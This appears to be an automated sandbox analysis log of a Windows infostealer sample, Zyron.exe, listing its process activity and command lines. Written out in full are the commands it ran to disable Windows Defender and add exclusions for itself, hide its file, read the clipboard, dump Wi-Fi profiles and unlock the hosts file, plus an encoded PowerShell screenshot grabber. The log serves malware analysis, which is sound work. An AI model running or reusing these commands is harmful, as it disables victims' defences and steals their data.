N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\_mei50802\rar.exe  N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1816 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 1816 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 4880 wrote to memory of 1548 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 4880 wrote to memory of 1548 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  \??\c:\users\admin\appdata\local\temp\zyron.exe 
PID 1548 wrote to memory of 2300 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2300 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 4628 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 4628 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1216 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1216 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3204 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3204 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 396 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 396 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 2300 wrote to memory of 3232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2300 wrote to memory of 3232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 3384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1216 wrote to memory of 3384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3204 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3204 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4628 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4628 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 396 wrote to memory of 3620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 396 wrote to memory of 3620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 1616 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\tree.com
PID 1548 wrote to memory of 1616 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\tree.com
PID 1616 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1616 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1548 wrote to memory of 1900 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\System32\Conhost.exe
PID 1548 wrote to memory of 1900 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\System32\Conhost.exe
PID 1900 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1900 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1548 wrote to memory of 2736 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2736 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2736 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 5076 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 5076 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 3220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5076 wrote to memory of 3220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 4596 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\tasklist.exe
PID 1548 wrote to memory of 4596 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\tasklist.exe
PID 1548 wrote to memory of 3228 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\wbem\wmiprvse.exe
PID 1548 wrote to memory of 3228 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\wbem\wmiprvse.exe
PID 3228 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3228 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4596 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4596 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1548 wrote to memory of 60 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 60 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2328 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2328 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 2328 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2328 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 60 wrote to memory of 3184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 60 wrote to memory of 3184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1548 wrote to memory of 2084 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2084 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2200 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2200 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2160 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2160 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 4816 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 4816 N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Zyron.exe

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'

C:\Windows\system32\attrib.exe

attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cj3lxvzi\cj3lxvzi.cmdline"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

